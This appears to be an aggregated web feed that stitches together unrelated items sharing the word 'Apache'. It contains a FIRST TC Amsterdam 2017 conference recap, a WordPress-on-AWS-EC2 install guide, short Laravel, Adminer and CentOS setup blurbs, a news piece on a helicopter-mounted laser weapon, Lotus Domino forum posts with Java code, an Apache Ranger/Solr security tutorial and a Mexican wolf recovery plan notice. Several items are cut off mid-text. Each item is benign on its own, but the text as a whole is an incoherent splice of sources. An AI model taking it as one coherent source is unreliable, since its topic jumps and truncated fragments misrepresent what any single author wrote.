The first day started with two guys from Facebook: Eric Water & Matt Moren. They presented the solution developed internally at Facebook to solve the problem of capturing network traffic: "PCAPs don't scale". In fact, with their solution, it scales! To investigate incidents, PCAPs are often the gold mine. They contain many IOCs, but they also introduce challenges: the disk space, the retention policy, the growing network throughput. When vendors' solutions don't fit, it's time to build your own solution. Ok, only big organizations like Facebook have the resources to do this, but it's quite fun. The solution they developed can be seen as a service: "PCAP as a Service". They started by building the right hardware for sensors and added a cool software layer on top of it. Once collected, interesting PCAPs are analyzed using the Cloudshark service. They explained how they reached top performance by mixing NFS and their GlusterFS solution. Really a cool solution if you have multi-gigabit networks to tap!

The next presentation focused on "internal network monitoring and anomaly detection through host clustering" by Thomas Atterna from TNO. The idea behind this talk was to explain how to also monitor internal traffic. Indeed, in many cases organizations still focus on the perimeter, but internal traffic is also important: we can detect proxies, rogue servers, C2, people trying to pivot, etc. The talk explained how to build clusters of hosts. A cluster of hosts is a group of devices that have the same behaviour, like mail servers, database servers, … Then to determine "normal" behaviour per cluster and observe when individual hosts deviate. Clusters are based on behaviour (the amount of traffic, the number of flows, protocols, …). The model is useful when your network is quite closed and stable, but much more difficult to implement in an "open" environment (like university networks).
Then Davide Carnali gave a nice review of the Nigerian cybercrime landscape. He explained in detail how they prepare their attacks, how they steal credentials, and how they deploy the attacking platform (RDP, RAT, VPN, etc). The second part was a step-by-step explanation of how they abuse companies to steal (sometimes a lot of!) money. An interesting fact reported by Davide: the time required between the compromise of a new host (to drop a malicious payload) and the generation of new maldocs pointing to this host is only… 3 hours!
The next presentation was performed by Gal Bitensky (Minerva): "Vaccination: An Anti-Honeypot Approach". Gal (re-)explained what the purpose of a honeypot is and how they can be defeated. Then, he presented a nice review of ways used by attackers to detect sandboxes. Basically, when a malware detects something "suspicious" (read: which makes it think that it is running in a sandbox), it will just silently exit. Gal had the idea to create a script which creates plenty of artefacts on a Windows system to defeat malware. His tool has been released here.
Paul Alderson (FireEye) presented "Injection without needles: A detailed look at the data being injected into our web browsers". Basically, it was a huge review of 18 months of web-inject and other configuration data gathered from several botnets. Nothing really exciting.
The next talk was more interesting… Back to the roots: SWITCH presented their DNS Firewall solution, a service they now provide to their members. It is based on DNS RPZ. The idea was to provide the following features:
  • Prevention
  • Detection
  • Awareness

Indeed, when a DNS request is blocked, the user is redirected to a landing page which gives more details about the problem. Note that this can have a collateral issue, like blocking a complete domain (and not only specific URLs). This is a great security control to deploy. Note that RPZ support is implemented in many solutions, especially BIND 9.
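For illustration only, a minimal BIND 9 RPZ setup might look like this (the zone name and file path are my assumptions, not SWITCH's actual configuration):

// named.conf: enable a local response policy zone
options {
    response-policy { zone "rpz.example"; };
};

zone "rpz.example" {
    type master;
    file "/etc/bind/db.rpz.example";
};

; db.rpz.example: rewrite a blocked name to the landing page
badsite.example    IN CNAME   landing.example.net.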

Finally, the first day ended with a presentation by Tatsuya Ihica from Recruit CSIRT: "Let your CSIRT do malware analysis". It was a complete review of the platform that they deployed to perform more efficient automatic malware analysis. The project is based on Cuckoo, which was heavily modified to match their new requirements.

The second day started with an introduction to the FIRST organization made by Aaron Kaplan, one of the board members. I liked the quote given by Aaron:

If country A does not talk to country B because of ‘cyber’, then a criminal can hide in two countries

Then, the first talk was really interesting: Chris Hall presented "Intelligence Collection Techniques". After explaining the different sources where intelligence can be collected (open sources, sinkholes, …), he reviewed a series of tools that he developed to help in the automation of these tasks. His tools address:
  • Using the Google API, VT API
  • Paste websites (like pastebin.com)
  • YARA rules
  • DNS typosquatting
  • Whois queries

All the tools are available here. A very nice talk with tips & tricks that you can use immediately in your organization.

The next talk was presented by a Cisco guy, Sunil Amin: "Security Analytics with Network Flows". NetFlow isn't a new technology. Initially developed by Cisco, there are today a lot of versions and forks. Based on the definition of a "flow" ("a layer 3 IP communication between two endpoints during some time period"), we got a review of NetFlow. NetFlow is valuable to increase the visibility of what's happening on your networks, but it also has some specific points that must be addressed before performing analysis, e.g. de-duplicating flows. There are many use cases where netflows are useful:
  • Discover RFC1918 address space
  • Discover internal services
  • Look for blacklisted services
  • Reveal reconnaissance
  • Bad behaviours
  • Compromised hosts, pivot
    • HTTP connection to external host
    • SSH reverse shell
    • Port scanning port 445 / 139
I would have expected a real case where netflow was used to discover something juicy. The talk ended with a review of tools available to process netflow data: SiLK, nfdump, ntop, but log management solutions can also be used, like the ELK stack or Apache Spot. Nothing really new but a good reminder.
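As a quick illustration of such a use case (a sketch; the flow directory is an assumption), nfdump can surface hosts scanning the SMB ports from stored flows:

nfdump -R /var/cache/nfdump -s srcip/flows 'dst port 445 or dst port 139'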
Then, Joel Snape from BT presented "Discovering (and fixing!) vulnerable systems at scale". BT, as a major player on the Internet, is facing many issues with compromised hosts (from customers to its own resources). Joel explained the workflow and tools they deployed to help in this huge task. It is based on the following cycle: introduction, data collection, exploration and remediation (the hardest part!).
I like the description of their “CERT dropbox” which can be deployed at any place on the network to perform the following tasks:
  • Telemetry collection
  • Data exfiltration
  • Network exploration
  • Vulnerability/discovery scanning
An interesting remark from the audience: ISPs don't only have to protect their customers from the wild Internet, but also the Internet from their (bad) customers!
Feike Hacquebord, from TrendMicro, explained "How politically motivated threat actors attack". He reviewed some famous stories of compromised organizations (like the French channel TV5), then reviewed the activity of some interesting groups like C-Major or Pawn Storm. A nice review of the Yahoo! OAuth abuse was performed, as well as the tab-nabbing attack against OWA services.
Jose Enrique Hernandez (Zenedge) presented "Lessons learned in fighting Targeted Bot Attacks". After a quick review of what bots are (they are not always malicious – think about the Google crawler bot), he reviewed different techniques to protect web resources from bots and why they often fail, like the JavaScript challenge or the Cloudflare bypass. These are "silent" challenges; "loud" challenges are, for example, CAPTCHAs. Then Jose explained how to build a good solution to protect your resources:
  • You need a reverse proxy (to be able to change requests on the fly)
  • LUA hooks
  • State db for concurrency
  • Load balancer for scalability
  • fingerprintjs2 / JS Challenge

Finally, two other Cisco guys, Steve McKinney & Eddie Allan, presented "Leveraging Event Streaming and Large Scale Analysis to Protect Cisco". Cisco is collecting a huge amount of data on a daily basis (they speak in terabytes!). As a Splunk user, they are facing an issue with the indexing licence. To index all these data, they would need extra licenses (and pay a lot of money). They explained how to "pre-process" the data before sending them to Splunk to reduce the noise and the amount of data to index.
The idea is to put a "black box" between the collectors and Splunk. They explained what's in this black box with some use cases:
  • WSA logs (350M+ events / day)
  • Passive DNS (7.5TB / day)
  • Users identification
  • osquery data

Some useful tips that they gave and that are valid for any log management platform:

  • Don’t assume your data is well-formed and complete
  • Don’t assume your data is always flowing
  • Don’t collect all the things at once
  • Share!

Two intense days full of useful information and tips to better defend your networks and/or collect intelligence. The slides should be published soon.

[The post FIRST TC Amsterdam 2017 Wrap-Up has been first published on /dev/random]


          Install WordPress on AWS EC2 Instance   
WordPress and AWS
After successful completion of the first and second steps, i.e. creating an EC2 instance and connecting to the EC2 instance in AWS using PuTTY or Terminal, it is time to install Apache, PHP and MySQL to run WordPress on an EC2 instance. If you are not familiar with the command line / Linux commands, just run these commands in the same order.

NOTE: This instruction is for Amazon Linux and will not work if you are trying different machine image like Ubuntu or Windows Server.

Connect to your instance via PuTTY  (Windows) / Terminal (Mac OS) / Bash (Linux OS)

Just to make sure everything is up to date
sudo yum -y update

If you want, you may switch directly from the 'ec2-user' account to root using the sudo su command.

Install multiple software packages:
sudo yum install -y httpd24 php70 mysql56-server php70-mysqlnd

Start Apache Server:
sudo service httpd start

Create a page to check your PHP installation

a) sudo vi /var/www/html/test.php
b) Type i to start insert mode
c) Type <?php phpinfo() ?>
d) Hit the Escape key, type :wq, and hit Enter to save and exit
e) Open a browser and visit http://ec2-xxx-xxx-xxx-xxx.us-west-1.compute.amazonaws.com/test.php (use your public DNS followed by /test.php)

If you see a phpinfo page then you are good to move forward, otherwise you may want to start over.

Delete the test.php file, as it was for information only and you definitely don't want to give away sensitive information about your server:

rm -f /var/www/html/test.php

Start and secure the MySQL service

Start MySQL service and run secure installation
sudo service mysqld start
sudo mysql_secure_installation

[Screenshot: mysql_secure_installation]
When prompted, enter a password for the root account. By default, the root account does not have a password set, so press Enter.

Type Y to set a password, and enter a secure password twice
1) Remove anonymous users? [Y/n] Y
2) Disallow root login remotely? [Y/n] Y
3) Remove test database and access to it? [Y/n] Y
4) Reload privilege tables now? [Y/n] Y

Restart MySQL to pick up the changes:
sudo service mysqld restart

Login into MySQL and Create a database for WordPress

Log in to the MySQL server as the root user and enter your MySQL root password when prompted
mysql -u root -p

Create a user name and password for your MySQL database.
CREATE USER 'aksgeek'@'localhost' IDENTIFIED BY 'aksgeekpassword';
Replace ‘aksgeek’ with your WordPress username and ‘aksgeekpassword’ with your strong password.


Create a database for WordPress:

[Screenshot: create a database for WordPress]


CREATE DATABASE `wordpressdb`;

(you can create a database with any name)
GRANT ALL PRIVILEGES ON `wordpressdb`.* TO "aksgeek"@"localhost";
FLUSH PRIVILEGES;
exit

Install WordPress
cd /var/www/html
wget https://wordpress.org/latest.tar.gz
tar -xzf latest.tar.gz
cd wordpress/
mv wp-config-sample.php wp-config.php
nano wp-config.php

[Screenshot: editing wp-config.php]
Start editing wp-config.php (use the arrow keys to move around).

define('DB_NAME', 'wordpressdb');
define('DB_USER', 'aksgeek');
define('DB_PASSWORD', 'aksgeekpassword');
define('DB_HOST', 'localhost');

Visit https://api.wordpress.org/secret-key/1.1/salt/ to randomly generate a set of key values that you can copy and paste into your wp-config.php file.
Ctrl + X
Save modified buffer (ANSWERING "No" WILL DESTROY CHANGES) ? Y
File Name to Write [DOS Format]: wp-config.php  hit Enter.
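For reference, the block you replace consists of the eight placeholder defines that ship with wp-config-sample.php:

define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');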

Move your WordPress installation to the root or into a subdirectory / folder

You may want to run your WordPress blog from the root (like your_public_dns.amazonaws.com/), then
mv * /var/www/html/

Or

Most of you will want to install it in a subdirectory or folder (for example, your_public_dns.amazonaws.com/blog), then
mkdir /var/www/html/blog
mv * /var/www/html/blog

To allow WordPress to use permalinks
sudo nano /etc/httpd/conf/httpd.conf

<Directory "/var/www/html">
    #
    # Possible values for the Options directive are "None", "All",
    # or any combination of:
    #   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
    #
    # Note that "MultiViews" must be named *explicitly* --- "Options All"
    # doesn't give it to you.
    #
    # The Options directive is both complicated and important.  Please see
    # http://httpd.apache.org/docs/2.4/mod/core.html#options
    # for more information.
    #
    Options Indexes FollowSymLinks

    #
    # AllowOverride controls what directives may be placed in .htaccess files.
    # It can be "All", "None", or any combination of the keywords:
    #   Options FileInfo AuthConfig Limit
    #
    AllowOverride None

    #
    # Controls who can get stuff from this server.
    #
    Require all granted
</Directory>

Find the section that starts with <Directory "/var/www/html"> and change the AllowOverride None line to AllowOverride All.

To ensure that the httpd and mysqld services start at every system boot
sudo chkconfig httpd on
sudo chkconfig mysqld on

Open a web browser and enter the URL of your WordPress blog; you should see the WordPress installation screen

Example for root installation:  http://ec2-xx-xxx-xxx-xxx-us-west-1.compute.amazonaws.com

or

for subdirectory / folder (blog): http://ec2-xx-xxx-xxx-xxx-us-west-1.compute.amazonaws.com/blog.

[Screenshot: WordPress installation finished]
Enter your site name, username, password and email address and hit submit.



Congratulations!! You are now running a WordPress blog on an Amazon Web Services (AWS) EC2 instance.

Troubleshooting

Having trouble updating and downloading themes/plugins in your WordPress blog because it is asking for FTP credentials? Then run this command:
sudo chown -R apache:apache /var/www/html

          Steps for configuring Laravel on Apache HTTP Server   
While most people develop Laravel applications on the excellent Homestead platform, which uses Nginx for the HTTP server, I still prefer to use the Apache 2 HTTP server, because it is the most widely supported, especially on shared hosting. Accordingly, I frequently set up Linux hosts, such as Vagrant boxes, to run Laravel with Apache. Here are … Continue reading Steps for configuring Laravel on Apache HTTP Server
          Fix ‘403 Forbidden’ error on Apache 2.4 HTTP server in Ubuntu   
In the latest versions (specifically version 2.4.3 and above) of the Apache 2.4 HTTP server, on a new installation, you may receive the ‘403 Forbidden’ HTTP error when attempting to display your site.  To increase security, the Apache developers changed the default configuration to block all requests.  To fix this, you must explicitly grant permissions via … Continue reading Fix ‘403 Forbidden’ error on Apache 2.4 HTTP server in Ubuntu
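The usual fix looks like this, a minimal sketch assuming your document root is /var/www/html:

<Directory "/var/www/html">
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>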
          Install latest version of Adminer MySQL administration tool on Ubuntu Linux   
Adminer is a lightweight, PHP-based MySQL administration tool that is a great alternative to PHPMyAdmin. It comes as a single file and can easily be installed globally on your Ubuntu Linux box, including a Vagrant box. The prerequisites for installing and using Adminer are PHP, MySQL, and Apache, the so-called LAMP stack. To install them … Continue reading Install latest version of Adminer MySQL administration tool on Ubuntu Linux
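A minimal installation on Ubuntu might look like this (a sketch; package names assume a recent Ubuntu, and the URL is Adminer's usual latest-version endpoint):

sudo apt-get update
sudo apt-get install -y apache2 mysql-server php libapache2-mod-php php-mysql
sudo wget -O /var/www/html/adminer.php https://www.adminer.org/latest.php
sudo systemctl reload apache2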
          Building a CentOS 7 + Apache 2.4 + PHP 7.1 environment   

Introduction: It's been a while, this is kenji. I'd like to walk through an installation on what I think is the most commonly used combination: CentOS 7.3, Apache 2.4 and PHP 7.1. Using the yum command, we'll build the environment with a target time of about 10 minutes...
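A condensed sketch of the steps (assuming the EPEL and Remi repositories for PHP 7.1; exact package names may differ):

sudo yum install -y epel-release
sudo rpm -Uvh http://rpms.remirepo.net/enterprise/remi-release-7.rpm
sudo yum install -y httpd
sudo yum --enablerepo=remi-php71 install -y php php-mbstring php-mysqlnd
sudo systemctl enable --now httpd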
          Successful first firing of a laser weapon from an attack helicopter [video]   

The first test by the US armed forces of a high-power laser weapon mounted on an Apache AH-64 attack helicopter was a success.

In the demonstration, held at the White Sands test range in New Mexico, the laser weapon located, targeted and hit a ground target at a distance of about 1.4 km.
The weapon, developed by Raytheon, is nearly silent and its shots almost invisible, which makes it particularly hard for enemies to detect; it may be used on battlefields in the near future.
Laser systems have been used on Apache helicopters since 1984, but they were low-power and served only to guide air-to-ground missiles. According to Raytheon, this was the first time a fully integrated laser system successfully hit a static target from a helicopter, across a variety of altitudes, speeds and flight phases.

These lasers are particularly accurate because, unlike conventional shells and bullets, they fire in a straight line, and they are powerful enough to destroy targets.
The company used an electro-optical infrared sensor, a variant of the Multi-Spectral Targeting System. It says the power of the laser beam can be adapted to each material, and that it can neutralize human targets without killing them.

During the test, cruise missiles, shells and other projectiles were neutralized, the company reported, noting that "unlike conventional weapons, lasers don't run out of bullets".
However, they use a lot of energy and for now cannot be used in fog or smoke, or against targets with a special anti-laser coating.
The US armed forces are increasingly turning to laser technology and already use such weapons to shoot down enemy missiles and unmanned drones.
Earlier this year, US infantry units used laser weapons for the first time during exercises, shooting down 50 drones.

Source: www.iefimerida.gr

          Mastering PHP 7   

Effective, readable, and robust code in PHP.

About This Book: Leverage the newest tools available in PHP 7 to build scalable applications. Embrace serverless architecture and the reactive programming paradigm, which are the latest additions to the PHP ecosystem. Explore dependency injection and implement design patterns to write elegant code.

Who This Book Is For: This book is for intermediate level developers who want to become a master of PHP. Basic knowledge of PHP is required across areas such as basic syntax, types, variables, constants, expressions, operators, control structures, and functions.

What You Will Learn: Grasp the current state of the PHP language and the PHP standards. Effectively implement logging and error handling during development. Build services through SOAP and REST and Apache Thrift. Get to know the benefits of serverless architecture. Understand the basic principles of reactive programming to write asynchronous code. Practically implement several important design patterns. Write efficient code by executing dependency injection. See the working of all magic methods. Handle the command-line area tools and processes. Control the development process with proper debugging and profiling.

In Detail: PHP is a server-side scripting language that is widely used for web development. With this book, you will get a deep understanding of the advanced programming concepts in PHP and how to apply them practically. The book starts by unveiling the new features of PHP 7 and walks you through several important standards set by the PHP Framework Interop Group (PHP-FIG). You'll see, in detail, the working of all magic methods, and the importance of effective PHP OOP concepts, which will enable you to write effective PHP code. You will find out how to implement design patterns and resolve dependencies to make your code base more elegant and readable. You will also build web services alongside microservices architecture, interact with databases, and work around third-party packages to enrich applications. This book delves into the details of PHP performance optimization. You will learn about serverless architecture and the reactive programming paradigm that found its way into the PHP ecosystem. The book also explores the best ways of testing your code, debugging, tracing, profiling, and deploying your PHP application. By the end of the book, you will be able to create readable, reliable, and robust applications in PHP to meet modern day requirements in the software industry.

Style and approach: This is a comprehensive, step-by-step practical guide to developing scalable applications using PHP 7.1.

Downloading the example code for this book: You can download the example code files for all Packt books you have purchased from your account at http://www.PacktPub.com. If you purchased this book elsewhere, you can visit http://www.PacktPub.com/support and register to have the code file.


          Ben 10 Overkill Apache   
This is definitely unwarranted. See how much destruction you can cause before the damage you take ends the game.
          Read WhatsApp messages on Server and Acknowledge Receipt by hemantrachh   
Create a Server Application which can read & store WhatsApp message sent to Server (Mobile Number Receiver) and Send a configured acknowledgement (on WhatsApp) back to Sender (Mobile Number). (Budget: ₹1500 - ₹12500 INR, Jobs: Apache, Java, Ubuntu, VPS, Web Services)
          (Senior) Software Engineer (for web applications in a LAMP environment) - KU Leuven - Leuven   
For the ICTS Directorate (Information & Communication Technology & Systems) we are looking for a (Sr.) software engineer for web applications in a LAMP environment. The KU Leuven web environment consists of the corporate KU Leuven website, the websites of various groups, and numerous in-house and hosted applications. Technically, the environment consists of several components. Alongside a web CMS (Plone) there is an extensive LAMP environment (Linux, Apache, MySQL, PHP). Within...
          Creating ltpa for domino connection from php/apache   
There are already many documents about LTPA and Domino. 1) The user logs into an Apache/PHP server which is authenticated via LDAP (Domino). 2) The user follows a link to a Domino site and needs to log on (we need single sign-on), i.e. we must create a valid Domino LTPA token for the connection. Does anyone have experience or tips and tricks? Thanks
          Doing SSL from Domino using HTTPClient   

 

For a customer we had a project that had to send SOAP messages over the internet so we had to look into HTTPS or SSL. Having done this back in the Java 1.1.8 (R5) days where you had to mess with the internals of Domino's JAR files I was a little worried.

But some googleing did show that some progress has been made(!). The Jakarta commons HTTP Client project comes to the rescue. http://jakarta.apache.org/httpcomponents/httpclient-3.x/index.html
It has been around for some time but that is usually a good thing. The latest stable version is 3.1.
It does all the things you could ask. Well it did not do proxying with the SOCKS protocol. But that is available in the 4 version - which is not stable yet.

Here is a very simple example just to show how simple it is to get started.
You need to put the files:
commons-codec-1.3.jar, commons-httpclient-3.1.jar, commons-logging-1.1.jar in your "\jvm\lib\ext" directory on your client and server.

Simple Agent example:
-------- cut here --------




import lotus.domino.AgentBase;
import lotus.domino.AgentContext;
import lotus.domino.Session;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.methods.*;

public class JavaAgent extends AgentBase {
 public void NotesMain() {
  try {
   Session session = getSession();
   AgentContext agentContext = session.getAgentContext();
   HttpClient client = new HttpClient();
   GetMethod method = new GetMethod("https://www.verisign.com/");
   try {
    int status = client.executeMethod( method );
    System.out.println(status + "\n" + method.getResponseBodyAsString());
   } finally {
    // release any connection resources used by the method
    method.releaseConnection();
   }
                
  } catch(Exception e) {
   e.printStackTrace();
  }
 }
}
-------- stop cutting here --------
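Since the whole point of the project was to send SOAP messages over HTTPS, the POST variant is almost as short. Here is a sketch under the same setup (the endpoint URL and envelope are placeholders, not from the original project):

-------- cut here --------
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.methods.PostMethod;
import org.apache.commons.httpclient.methods.StringRequestEntity;

public class SoapPost {
 public static void main(String[] args) throws Exception {
  HttpClient client = new HttpClient();
  PostMethod method = new PostMethod("https://example.com/soap/endpoint");
  // wrap the SOAP envelope with the proper content type and charset
  String soap = "<soapenv:Envelope>...</soapenv:Envelope>";
  method.setRequestEntity(new StringRequestEntity(soap, "text/xml", "UTF-8"));
  method.setRequestHeader("SOAPAction", "\"\"");
  try {
   int status = client.executeMethod(method);
   System.out.println(status + "\n" + method.getResponseBodyAsString());
  } finally {
   // release any connection resources used by the method
   method.releaseConnection();
  }
 }
}
-------- stop cutting here --------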

          XMLfo resources for Domino? (for generating pdf)   

I am involved in a project that seems to go towards having to generate a lot of PDF-files.

So I am researching the XMLfo Apache project to see if it could solve the problem. Has anyone used it with Domino? Or know of someone who has?


          Sysadmin   
Skills: Administering Ubuntu, CentOS and Windows web servers. Knowledge of Apache, Nginx, MySQL, Postfix, Iptables, Varnish, cPanel/WHM, Git, Pound, ElasticSearch, Redis, DNS (Bind). Comfortable with the PHP and Ruby languages. Knowledge of continuous deployment systems: Jenkins, Ansible, … Continue reading
          Sysadmin (DevOps)   
Skills: Administering Ubuntu, CentOS and Windows web servers. Knowledge of Apache, Nginx, MySQL, Postfix, Iptables, Varnish, cPanel/WHM, Git, Pound, ElasticSearch, Redis, DNS (Bind). Comfortable with the PHP and Ruby languages. Knowledge of continuous deployment systems: Jenkins, Ansible, … Continue reading
          Overkill Apache   
Fly through the sky with your helicopter and shoot down all the military enemies that get in your way.
          Apache OpenOffice 4.1.2 Intel - The luxury suite that costs you nothing   

OpenOffice.org is the most popular free office suite. Among the new features introduced in version 3.0, the long-awaited compatibility with Office 2007 formats stands out, and at last you no longer need to install X11 to run it.

Gone are the days when you were forced to pay a prohibitive price (or get hold of an illegal copy) to have an efficient suite of programs for writing a letter, creating a presentation or using a spreadsheet. There are now completely free solutions that have nothing to envy Microsoft Office, and among these OpenOffice.org is probably the best.

OpenOffice.org includes Writer (word processor), Calc (spreadsheet), Impress (presentations), Base (database), Math (mathematical formulas) and Draw (vector graphics). The suite works with many document formats, can edit and export PDF files, and is fully compatible with the most common Microsoft Office formats (including .doc, .xls and .ppt).

Since version 3.0, OpenOffice.org is finally an application with an Aqua interface, and you no longer need to install X11 to run it. Other notable changes include the ability to open the Open XML files introduced in Office 2007, such as .docx, .xlsx and .pptx. As for the interface, the icons and some details have been revised, but the design remains very similar to the previous version, and we expected more of an evolution on this front.

Other features introduced in OpenOffice.org 3.0 include a launch window, called the Start Centre, to access the different applications and templates; support for 1024 columns in spreadsheets; an improved image-cropping function in Draw and Impress; and the ability to display multiple pages of text while working in Writer.

Download Apache OpenOffice 4.1.2 Intel on Softonic


          The Army is flight testing helicopter-mounted laser weapons   

The US military's experiments shooting lasers from vehicles continue with another important milestone: a laser-equipped attack helicopter fired at targets for the first time. The US Army keeps getting better at nailing UAV targets with ground-based truck lasers, but it's harder to fire accurately from helicopters. Not only does their position fluctuate with airborne conditions, but their whole frame vibrates as their rotors spin fast enough to keep the whole vehicle aloft. Hitting a target almost a mile away from the air, as the Army just accomplished in a New Mexico test series, is a big deal.

Via: NY Post

Source: Raytheon


          Why don't the while loop and the if - elsif conditional work correctly?   

Why don't the while loop and the if - elsif conditional work correctly?

Hello, I'm a Java student and I don't understand why the output of this program comes out the way it does. I hope you can help me understand and improve the code of this simple program. Thanks a lot in advance.

Here is the code (also in the zip):

import java.util.Scanner; import com.sun.org.apache.xerces.internal.util.SynchronizedSymbolTable; public class AdivinarACpuV2 { public static void main(String[] args) { Scanner scanner = new Scanner...

Posted on June 30, 2017 by Mateo

          Senior Support Engineer - GridGain - Time, IL   
Technical support for GridGain and Apache Ignite products. Close interaction with GridGain development team and Apache Ignite open source community....
From GridGain - Wed, 10 May 2017 19:19:23 GMT - View all Time, IL jobs
          Colm O hEigeartaigh: Securing Apache Solr - part III   
This is the third post in a series of articles on securing Apache Solr. The first post looked at setting up a sample SolrCloud instance and securing access to it via Basic Authentication. The second post looked at how the Apache Ranger admin service can be configured to store audit information in Apache Solr. In this post we will extend the example in the first article to include authorization, by showing how to create and enforce authorization policies using Apache Ranger.

1) Install the Apache Ranger Solr plugin

The first step is to install the Apache Ranger Solr plugin. Download Apache Ranger and verify that the signature is valid and that the message digests match. Now extract and build the source, and copy the resulting plugin to a location where you will configure and install it:
  • mvn clean package assembly:assembly -DskipTests
  • tar zxvf target/ranger-${version}-solr-plugin.tar.gz
  • mv ranger-${version}-solr-plugin ${ranger.solr.home}
Now go to ${ranger.solr.home} and edit "install.properties". You need to specify the following properties:
  • POLICY_MGR_URL: Set this to "http://localhost:6080"
  • REPOSITORY_NAME: Set this to "solr_service".
  • COMPONENT_INSTALL_DIR_NAME: The location of your Apache Solr server directory
Save "install.properties" and install the plugin as root via "sudo -E ./enable-solr-plugin.sh". Make sure that the user who is running Solr can read the "/etc/ranger/solr_service/policycache". Now follow the first tutorial to get an example SolrCloud instance up and running with a "gettingstarted" collection. We will not enable the authorization plugin just yet.

2) Create authorization policies for Solr using the Apache Ranger Admin service

Now follow the second tutorial to download and install the Apache Ranger admin service. To avoid conflicting with the Solr example we are securing, we will skip the section about auditing to Apache Solr (sections 3 and 4). In addition, in section 5 the "audit_store" property can be left empty, and the Solr audit properties can be omitted. Start the Apache Ranger admin service via: "sudo ranger-admin start", and open a browser at "http://localhost:6080", logging on with "admin/admin" credentials. Click on the "+" button for the Solr service and create a new service with the following properties:
  • Service Name: solr_service
  • Username: alice
  • Password: SolrRocks
  • Solr URL: http://localhost:8983/solr
Hit the "Test Connection" button and it should show that it has successfully connected to Solr. Click "Add" and then click on the "solr_service" link that is subsequently created. We will grant a policy that allows "alice" the ability to read the "gettingstarted" collection. If "alice" is not already created, go to "Settings/User+Groups" and create a new user there. Delete the default policy that is created in the "solr_service" and then click on "Add new policy" and create a new policy called "gettingstarted_policy". For "Solr Collection" enter "g" here and the "gettingstarted" collection should pop up. Add a new "allow condition" granting the user "alice" the "others" and "query" permissions.




3) Test authorization using the Apache Ranger plugin for Solr

Now we are ready to enable the Apache Ranger authorization plugin for Solr. Download the following security configuration which enables Basic Authentication in Solr as well as the Apache Ranger authorization plugin:
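The linked file itself is not reproduced in this excerpt; as a rough sketch, such a configuration might look like the following (the credential strings are placeholders for Solr's salted SHA-256 format, and the authorizer class name is the one shipped with the Ranger Solr plugin):

{
  "authentication": {
    "blockUnknown": true,
    "class": "solr.BasicAuthPlugin",
    "credentials": {
      "alice": "<base64 sha256 hash> <base64 salt>",
      "bob": "<base64 sha256 hash> <base64 salt>"
    }
  },
  "authorization": {
    "class": "org.apache.ranger.authorization.solr.authorizer.RangerSolrAuthorizer"
  }
}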
Now upload this configuration to the Apache Zookeeper instance that is running with Solr:
  • server/scripts/cloud-scripts/zkcli.sh -zkhost localhost:9983 -cmd putfile /security.json security.json
Now let's try to query the "gettingstarted" collection as 'alice':
  • curl -u alice:SolrRocks http://localhost:8983/solr/gettingstarted/query?q=author_s:Arthur+Miller
This should be successful. However, authorization will fail for the case of "bob":
  • curl -u bob:SolrRocks http://localhost:8983/solr/gettingstarted/query?q=author_s:Arthur+Miller
In addition, although "alice" can query the collection, she can't write to it, and the following query will return 403:
  • curl -u alice:SolrRocks http://localhost:8983/solr/gettingstarted/update -d '[ {"id" : "book4", "title_t" : "Hamlet", "author_s" : "William Shakespeare"}]'

          Mexican Wolf Draft Revised Recovery Plan Released for Public Comment   
Series of public meetings will provide additional opportunities for public review

June 29, 2017

Contact(s):

John Bradley (505) 248-6279, john_bradley@fws.gov
Jeff Humphrey (602) 889-5946, jeff_humphrey@fws.gov



ALBUQUERQUE, NEW MEXICO – The U.S. Fish and Wildlife Service has released a draft revision to the Mexican Wolf Recovery Plan. The plan guides Mexican wolf recovery efforts by the bureau and its partners, with the ultimate goal of removing this wolf subspecies from Endangered Species Act (ESA) protections and returning management to the appropriate states and tribes. The Service is now seeking public input and peer review on the draft revised plan through a public comment period and series of public meetings. The comment period will remain open through August 29, 2017.
The recovery strategy outlined in the plan is to establish two Mexican wolf populations distributed in core areas within the subspecies’ historical range in the United States and Mexico. This strategy addresses the threats to the species, including the extinction risk associated with small population size and the loss of genetic diversity. The draft plan provides estimates of the time and resources required to carry out this strategy and the associated measures needed to achieve the plan’s goal.
At the time of recovery, the Service expects Mexican wolf populations to be stable or increasing in abundance, well-distributed geographically within their historical range, and genetically diverse.
In the United States, the recovery strategy will focus on the area south of I-40 in Arizona and New Mexico in the area designated as the Mexican Wolf Experimental Population Area.  In Mexico, federal agencies are focusing on the Sierra Madre Occidental Mountains in Sonora, Durango, and Chihuahua.
The current Mexican Wolf Recovery Plan dates back to 1982. In April 2016, the Service signed a Settlement Agreement with the Arizona Game and Fish Department and Defenders of Wildlife to complete a final revised Mexican Wolf Recovery Plan by the end of November 2017.
To ensure that we are able to address public comments and meet the agreed-upon completion date, we will not be extending the comment period beyond the designated time.
To review and comment on the draft revised recovery plan and related documents, visit www.regulations.gov and enter the docket number FWS–R2–ES–2017–0036 in the search bar. Click the “Comment Now” button to submit your comments.
Alternatively you may request documents by mail by writing to: U.S. Fish and Wildlife Service, New Mexico Ecological Services Field Office, 2105 Osuna Road NE, Albuquerque, NM 87113; or  by calling: (505) 346–2525. Comments may be mailed or hand delivered to: Public Comments Processing, Attn: FWS–R4–ES–2017–0036, U.S. Fish and Wildlife Service, MS: BPHC, 5275 Leesburg Pike, Falls Church, VA 22041–3803.
The Service will also hold four public meetings to provide an opportunity for citizens to learn about the revised Mexican wolf recovery plan and to provide written comments (oral comments will not be recorded).
The dates and times of these information meetings are as follows:
  1. July 18, 2017 (6:00 p.m. to 9:00 p.m.): Flagstaff: Northern Arizona University, Prochnow Auditorium, South Knowles Drive, Flagstaff, AZ 86001.
  2. July 19, 2017 (6:00 p.m. to 9:00 p.m.): Pinetop: Hon-Dah Resort, Casino Banquet Hall, 777 AZ–260, Pinetop, AZ 85935.
  3. July 20, 2017 (6:00 p.m. to 9:00 p.m.): Truth or Consequences: Ralph Edwards Auditorium, Civic Center, 400 West Fourth, Truth or Consequences, NM 87901.
